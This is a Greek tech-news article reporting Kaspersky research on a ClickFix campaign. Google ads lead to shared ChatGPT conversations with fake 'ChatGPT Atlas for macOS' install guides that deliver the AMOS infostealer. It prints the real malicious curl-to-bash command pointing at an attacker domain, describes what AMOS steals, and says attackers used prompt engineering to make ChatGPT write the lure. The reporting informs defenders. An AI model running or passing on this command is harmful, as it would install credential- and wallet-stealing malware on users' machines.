Close Menu
TechReport.grTechReport.gr
  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology

Subscribe to Updates

Get the latest creative news from FooBar about art, design and business.

What's Hot
Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking

Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking

11 Δεκεμβρίου 2025
Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές

Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές

11 Δεκεμβρίου 2025

Η Rockstar αμφισβητεί ξανά ότι το προσωπικό απολύθηκε για συνδικαλιστική οργάνωση, επιμένει ότι “διένειμε εμπιστευτικές πληροφορίες σε δημόσιο φόρουμ”

11 Δεκεμβρίου 2025
Facebook X (Twitter) Instagram
  • Home
  • Πολιτική απορρήτου
  • Σχετικά με εμάς
  • Contact With TechReport
  • Greek Live Channels IPTV 2025
Facebook X (Twitter) Instagram Pinterest Vimeo
TechReport.grTechReport.gr
  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
TechReport.grTechReport.gr
Αρχική » Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking
Security

Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking

Marizas DimitrisBy Marizas Dimitris11 Δεκεμβρίου 2025Δεν υπάρχουν Σχόλια3 Mins Read
Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking
Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking
Share
Facebook Twitter LinkedIn Pinterest Tumblr Telegram WhatsApp Email


Μια νέα κακόβουλη καμπάνια στοχεύει χρήστες macOS μέσω μιας νέας επίθεσης που εκμεταλλεύεται τον επίσημο ιστότοπο του ChatGPT.

Οι εισβολείς χρησιμοποιούν μια τεχνική που ονομάζεται ClickFix για να διαδώσουν το infostealer AMOS δημοσιεύοντας ψεύτικους οδηγούς εγκατάστασης στον νόμιμο τομέα chatgpt.com.

Αυτή η καμπάνια αξιοποιεί τη δυνατότητα κοινής χρήσης συνομιλίας του ChatGPT, όπου οποιοσδήποτε χρήστης μπορεί να δημιουργήσει μια δημόσια συνομιλία και να τη μοιραστεί με άλλους μέσω ενός συνδέσμου που φαίνεται να προέρχεται από τον επίσημο ιστότοπο του OpenAI.

Η επίθεση ξεκινά με πληρωμένες διαφημίσεις αναζήτησης στο Google. Όταν οι χρήστες αναζητούν “άτλαντα chatgpt”, συναντούν συνδέσμους χορηγίας που φαίνεται να οδηγούν απευθείας στον επίσημο τομέα ChatGPT.

Ένας σύνδεσμος χορηγίας στα αποτελέσματα αναζήτησης Google οδηγεί σε έναν οδηγό εγκατάστασης κακόβουλου λογισμικού που μεταμφιέζεται ως ChatGPT Atlas για macOS και φιλοξενείται στον επίσημο ιστότοπο ChatGPT (Πηγή - Kaspersky)
Ένας σύνδεσμος χορηγίας στα αποτελέσματα αναζήτησης Google οδηγεί σε έναν οδηγό εγκατάστασης κακόβουλου λογισμικού που μεταμφιέζεται ως ChatGPT Atlas για macOS και φιλοξενείται στον επίσημο ιστότοπο ChatGPT (Πηγή – Kaspersky)

Η διαφήμιση εμφανίζει τον τίτλο “ChatGPT™ Atlas για macOS – Λήψη ChatGPT Atlas για Mac”, που την κάνει να φαίνεται απολύτως νόμιμη.

Οι χρήστες που κάνουν κλικ σε αυτές τις διαφημίσεις οδηγούνται σε μια κοινόχρηστη συνομιλία ChatGPT που περιέχει ψεύτικες οδηγίες εγκατάστασης για το ανύπαρκτο πρόγραμμα περιήγησης Atlas.

Μετά από εκτενή ανάλυση, οι ερευνητές ασφάλειας της Kaspersky αναγνωρισθείς ότι οι κακόβουλοι παράγοντες χρησιμοποίησαν άμεση μηχανική για να αναγκάσουν το ChatGPT να δημιουργήσει έναν πειστικό οδηγό εγκατάστασης.

Στη συνέχεια, οι εισβολείς καθάρισαν το ιστορικό συνομιλιών για να αφαιρέσουν οποιοδήποτε ύποπτο περιεχόμενο προτού δημοσιοποιήσουν τη συνομιλία.

Ο οδηγός εγκατάστασης για τον υποτιθέμενο Atlas για macOS είναι απλώς μια κοινόχρηστη συνομιλία μεταξύ ενός ανώνυμου χρήστη και του ChatGPT (Πηγή - Kaspersky)
Ο οδηγός εγκατάστασης για τον υποτιθέμενο Atlas για macOS είναι απλώς μια κοινόχρηστη συνομιλία μεταξύ ενός ανώνυμου χρήστη και του ChatGPT (Πηγή – Kaspersky)

Ο οδηγός εμφανίζεται στον υποτομέα chatgpt.com/share/, κάτι που μπορεί να τον κάνει να φαίνεται πιο αξιόπιστος στους χρήστες που μπορεί να μην αναγνωρίζουν ότι πρόκειται απλώς για μια κοινή συνομιλία και όχι για επίσημο περιεχόμενο από το OpenAI.

Ο Μηχανισμός Λοιμώξεων

Ο πλαστός οδηγός εγκατάστασης καθοδηγεί τους χρήστες να ανοίξουν την εφαρμογή Terminal στο Mac τους και να εκτελέσουν μια συγκεκριμένη εντολή.

Ο κακόβουλος κώδικας μοιάζει με αυτό:

/bin/bash -c “$(curl -fsSL ‘https://atlas-extension.com/gt’)”

Αυτή η εντολή κατεβάζει ένα κακόβουλο σενάριο από τον διακομιστή που ελέγχεται από τον εισβολέα στο atlas-extension.com και το εκτελεί αμέσως στον υπολογιστή του θύματος.

Όταν εκτελείται, το σενάριο ζητά τον κωδικό πρόσβασης συστήματος και ζητά επανειλημμένα μέχρι να εισαχθεί ο σωστός κωδικός πρόσβασης. Μόλις δοθεί ο κωδικός πρόσβασης, το σενάριο πραγματοποιεί λήψη του AMOS infostealer και το εγκαθιστά χρησιμοποιώντας τα κλεμμένα διαπιστευτήρια.

Εάν ρωτήσετε το ChatGPT εάν πρέπει να ακολουθήσετε τις οδηγίες που λάβατε, θα σας απαντήσει ότι δεν είναι ασφαλές (Πηγή - Kaspersky)
Εάν ρωτήσετε το ChatGPT εάν πρέπει να ακολουθήσετε τις οδηγίες που λάβατε, θα απαντήσει ότι δεν είναι ασφαλές (Πηγή – Kaspersky)

Το AMOS μπορεί να κλέψει κωδικούς πρόσβασης, cookies και άλλα δεδομένα προγράμματος περιήγησης από το Chrome και τον Firefox. Στοχεύει επίσης πληροφορίες πορτοφολιού κρυπτονομισμάτων από εφαρμογές όπως το Electrum, το Coinomi και το Exodus.

Το κακόβουλο λογισμικό συλλέγει αρχεία με επεκτάσεις TXT, PDF και DOCX από φακέλους όπως Desktop, Documents και Downloads. Επιπλέον, εγκαθιστά μια κερκόπορτα που ξεκινά αυτόματα κατά την εκκίνηση του συστήματος, δίνοντας στους εισβολείς μόνιμα απομακρυσμένη πρόσβαση στο μολυσμένο σύστημα.



VIA: cybersecuritynews.com

Related Posts


Χάκερ αξιοποιούν τις κοινόχρηστες συνομιλίες LLM για να κλέψουν τους κωδικούς πρόσβασης και τα κρυπτογραφικά σας στοιχεία
Security

Οι ηθοποιοί απειλών οπλίζουν τις συνομιλίες ChatGPT και Grok για να αναπτύξουν το AMOS Stealer
Security

Threat Actors αξιοποιούν το ChatGPT για να επιτεθούν σε συσκευές Mac με το AMOS InfoStealer
Security
AMOS Google mac macOS ασφάλεια στον κυβερνοχώρο νέα για την ασφάλεια στον κυβερνοχώρο
Share. Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram WhatsApp Email
Previous ArticleΤο πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές
Marizas Dimitris
  • Website
  • Facebook

Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.

Related Posts

Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές
Android

Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές

11 Δεκεμβρίου 2025
ΣΟΚ! ΗΠΑ: Νέα εντολή κάνει την Times New Roman ΥΠΟΧΡΕΩΤΙΚΗ για όλα τα διπλωματικά έγγραφα! Δείτε γιατί!
Technology

ΣΟΚ! ΗΠΑ: Νέα εντολή κάνει την Times New Roman ΥΠΟΧΡΕΩΤΙΚΗ για όλα τα διπλωματικά έγγραφα! Δείτε γιατί!

11 Δεκεμβρίου 2025
GPT-5.2: Το OpenAI λανσάρει επίσημα το εμβληματικό μοντέλο του
Technology

GPT-5.2: Το OpenAI λανσάρει επίσημα το εμβληματικό μοντέλο του

11 Δεκεμβρίου 2025
Add A Comment
Leave A Reply Cancel Reply

Top Posts

Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

13 Νοεμβρίου 20251.156 Views

Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

30 Οκτωβρίου 2025570 Views
Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

12 Νοεμβρίου 2025468 Views
Stay In Touch
  • Facebook
  • YouTube
  • TikTok
  • WhatsApp
  • Twitter
  • Instagram
Latest News
Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking Security

Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking

Marizas Dimitris11 Δεκεμβρίου 2025
Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές Android

Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές

Marizas Dimitris11 Δεκεμβρίου 2025
Entertainment

Η Rockstar αμφισβητεί ξανά ότι το προσωπικό απολύθηκε για συνδικαλιστική οργάνωση, επιμένει ότι “διένειμε εμπιστευτικές πληροφορίες σε δημόσιο φόρουμ”

Marizas Dimitris11 Δεκεμβρίου 2025
Most Popular

Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

13 Νοεμβρίου 20251.156 Views

Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

30 Οκτωβρίου 2025570 Views
Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

12 Νοεμβρίου 2025468 Views
About TechReport.gr

Το TechReport.gr ιδρύθηκε με στόχο να αποτελέσει την πρώτη πηγή ενημέρωσης για όσους αναζητούν αξιόπιστη και εμπεριστατωμένη κάλυψη του τεχνολογικού κόσμου. Από την αρχή της λειτουργίας του, το site έχει δεσμευτεί στην παροχή ποιοτικού περιεχομένου που συνδυάζει ενημέρωση, ανάλυση και πρακτικές συμβουλές.
• Email: [email protected]
• Phone: +30 6980 730 713
Copyright © 2025| TechReport.gr | A project by: Δημήτρης Μάριζας
Λογότυπα, επωνυμίες, εμπορικά σήματα και γνωρίσματα ανήκουν στους νόμιμους ιδιοκτήτες.

Our Picks
Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking

Οι νέες επιθέσεις ClickFix καθώς το macOS Infostealer αξιοποιεί τον επίσημο ιστότοπο ChatGPT από την Piggybacking

11 Δεκεμβρίου 2025
Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές

Το πιο πρόσφατο εργαλείο τεχνητής νοημοσύνης της Google μετατρέπει ανοιχτές καρτέλες γεμάτες έρευνα σε διαδραστικές εφαρμογές

11 Δεκεμβρίου 2025

Η Rockstar αμφισβητεί ξανά ότι το προσωπικό απολύθηκε για συνδικαλιστική οργάνωση, επιμένει ότι “διένειμε εμπιστευτικές πληροφορίες σε δημόσιο φόρουμ”

11 Δεκεμβρίου 2025
Facebook X (Twitter) Instagram Pinterest
  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
© 2025 TechReport.gr Designed and Developed by Dimitris Marizas.

Type above and press Enter to search. Press Esc to cancel.

Ad Blocker Enabled!
Ad Blocker Enabled!
Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.